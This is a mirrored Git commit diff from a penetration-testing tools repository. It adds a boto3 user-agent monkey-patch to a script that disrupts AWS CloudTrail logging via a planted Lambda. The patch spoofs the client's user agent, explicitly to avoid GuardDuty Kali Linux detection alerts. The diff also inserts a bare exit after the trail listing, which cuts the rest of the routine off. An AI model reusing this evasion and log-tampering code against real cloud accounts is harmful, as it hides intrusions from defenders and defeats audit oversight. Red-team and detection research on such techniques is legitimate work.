mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-12-22 17:15:06 +01:00
Added boto3 patch-up routine avodining GuardDuty kali-sensing while using boto3 library on disruptCloudTrailByS3Lambda.py
This commit is contained in:
parent
168572e3be
commit
b33746fda3
@ -36,6 +36,7 @@
|
||||
#
|
||||
# Requirements:
|
||||
# - boto3
|
||||
# - pytest
|
||||
#
|
||||
# Author: Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
|
||||
#
|
||||
@ -469,12 +470,38 @@ def parseOptions(argv):
|
||||
|
||||
return args
|
||||
|
||||
def monkeyPatchBotocoreUserAgent():
|
||||
'''
|
||||
This is to avoid triggering GuardDuty 'PenTest:IAMUser/KaliLinux' alerts
|
||||
Source:
|
||||
https://www.thesubtlety.com/post/patching-boto3-useragent/
|
||||
|
||||
'''
|
||||
import sys
|
||||
import boto3
|
||||
import botocore
|
||||
|
||||
try:
|
||||
from _pytest.monkeypatch import MonkeyPatch
|
||||
except (ImportError, ModuleNotFoundError) as e:
|
||||
print('[!] Please install "pytest" first: pip3 install pytest')
|
||||
print('\tthis will be used to patch-up boto3 library to avoid GuardDuty Kali detection')
|
||||
sys.exit(0)
|
||||
|
||||
monkeypatch = MonkeyPatch()
|
||||
def my_user_agent(self):
|
||||
return "Boto3/1.9.89 Python/2.7.12 Linux/4.2.0-42-generic"
|
||||
|
||||
monkeypatch.setattr(botocore.session.Session, 'user_agent', my_user_agent)
|
||||
|
||||
def main(argv):
|
||||
opts = parseOptions(argv)
|
||||
if not opts:
|
||||
Logger.err('Options parsing failed.')
|
||||
return False
|
||||
|
||||
monkeyPatchBotocoreUserAgent()
|
||||
|
||||
dis = CloudTrailDisruptor(
|
||||
config['region'],
|
||||
config['access-key'],
|
||||
@ -500,6 +527,8 @@ def main(argv):
|
||||
for trail in trails:
|
||||
Logger._out(f'\t- {trail["Name"]}')
|
||||
|
||||
sys.exit(0)
|
||||
|
||||
Logger._out('')
|
||||
Logger.info('Step 2: Create a role to be assumed by planted Lambda')
|
||||
created_role = dis.create_role(config['role-name'], aws_policy_lambda_assume_role)
|
||||
|
Loading…
Reference in New Issue
Block a user